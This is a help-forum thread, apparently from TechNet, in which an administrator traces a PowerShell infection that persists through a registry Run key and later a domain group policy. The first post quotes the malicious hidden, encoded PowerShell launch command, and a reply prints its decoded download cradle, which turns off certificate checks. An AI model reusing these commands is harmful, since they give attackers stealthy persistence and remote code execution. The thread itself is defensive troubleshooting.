Suspicious Powershell Activity RRS feed

  • السؤال

  • Hello,

    We've found a powershell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address - not associated with our company at all.  I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:


    Below is a screenshot of the processes that start when logging in:

    Powershell processes

    For the time being, we've put in place a rule to prevent Powershell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,


    20/شوال/1437 03:03 م

جميع الردود

  • after decoding and decompressing the encoded string, one gets to a commmand which downloads a further script:

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    (New-Object Net.WebClient).DownloadString('')

    the resulting script seems to be based on PowerSploit

    20/شوال/1437 07:53 م
  • OK.  That makes sense since the inital tasks that are started have the web address string in the command line within Task Manager.

    Any idea where this may be downloading the scripts, or where I need to search next for possible infection?



    20/شوال/1437 07:57 م
  • what do you mean "where this may be downloading the scripts"?
    It is run via the registry key you found, which you should delete.
    It is downloading from the ip address
    The original vector/dropper might have been via browser or email.

    I for myself would nuke from orbit ( = reinstall Windows), but you could contact someone at

    20/شوال/1437 08:58 م
  • Unfortunately, when I delete this reg key from my PC, it gets reapplied within a few hours.  I need to find the source PC first before I nuke anything.

    I'll post at to see if they can help with how to track down the source (and hopefully prevent more!)

    Thanks for the help.


    21/شوال/1437 11:21 ص
  • We are looking forward to your good news:)

    Please mark the reply as an answer if you find it is helpful.

    If you have feedback for TechNet Support, contact

    22/شوال/1437 09:44 ص
  • So mystery is somewhat solved.  I traced it down to a powershell command that was placed in our default domain group policy.  I removed this entry and it seems to be slowing removing itself from the network.  

    The next thing to figure out now is where this came from.  There are only three people at our company with the domain password and none of us put that there.  

    The task that was running in the group policy, said it was created by domain\administrator so we are a bit perplexed over this one.  Any ideas on how to trace this part of it?




    02/ذو القعدة/1437 07:53 م